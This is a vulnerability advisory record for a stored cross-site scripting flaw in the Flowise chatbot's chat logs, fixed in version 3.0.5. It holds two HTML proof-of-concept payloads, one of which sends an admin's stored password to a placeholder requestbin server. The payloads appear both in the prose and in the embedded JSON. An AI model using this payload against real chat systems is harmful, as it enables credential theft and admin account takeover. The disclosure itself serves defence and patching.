GHSA-7R4H-VMJ9-WG42

Vulnerability from github – Published: 2025-10-03 21:48 – Updated: 2025-10-13 17:05
VLAI?
Summary
Flowise Stored XSS vulnerability through logs in chatbot
Details

Description

In the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin's credentials or sensitive information with stored Cross Site Scripting.

PoC

<form>
  <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:alert('XSS!!!');" />
</form>

If the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts ‘XSS!!!’. It means stored xss is able in the chatbot.

<form>
  <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:window.location.href='<YOUR_REQUESTBIN_SERVER>?passwd=' + encodeURIComponent(localStorage.getItem('password'));" />
</form>

So when an admin clicks the img that generated by above html code, it sends a request, including credentials, to the attacker's IP. If attacker steal admin’s token, attacker can login as the admin in the apps.

Poc Video

poc

Impact

An attacker could hijack an admin account in published chatbot. This can allow attacker to view chat logs of other users and API keys.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-29192"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-03T21:48:36Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Description\nIn the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin\u0027s credentials or sensitive information with stored Cross Site Scripting.\n\n### PoC\n```html\n\u003cform\u003e\n  \u003cinput type=\"image\" src=\"/assets/account-3i3qpYzs.png\" width=\"800\" height=\"400\" formaction=\"javascript:alert(\u0027XSS!!!\u0027);\" /\u003e\n\u003c/form\u003e\n```\nIf the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts \u2018XSS!!!\u2019. It means stored xss is able in the chatbot.\n```html\n\u003cform\u003e\n  \u003cinput type=\"image\" src=\"/assets/account-3i3qpYzs.png\" width=\"800\" height=\"400\" formaction=\"javascript:window.location.href=\u0027\u003cYOUR_REQUESTBIN_SERVER\u003e?passwd=\u0027 + encodeURIComponent(localStorage.getItem(\u0027password\u0027));\" /\u003e\n\u003c/form\u003e\n```\nSo when an admin clicks the img that generated by above html code, it sends a request, including credentials, to the attacker\u0027s IP. If attacker steal admin\u2019s token, attacker can login as the admin in the apps.\n\n### Poc Video\n[poc](https://drive.google.com/file/d/1_3HwU0MxZ4HfJqpx2mOBjxf-WSCMM_4o/view?usp=sharing)\n\n### Impact\nAn attacker could hijack an admin account in published chatbot. This can allow attacker to view chat logs of other users and API keys.",
  "id": "GHSA-7r4h-vmj9-wg42",
  "modified": "2025-10-13T17:05:32Z",
  "published": "2025-10-03T21:48:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/pull/4905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise Stored XSS vulnerability through logs in chatbot"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…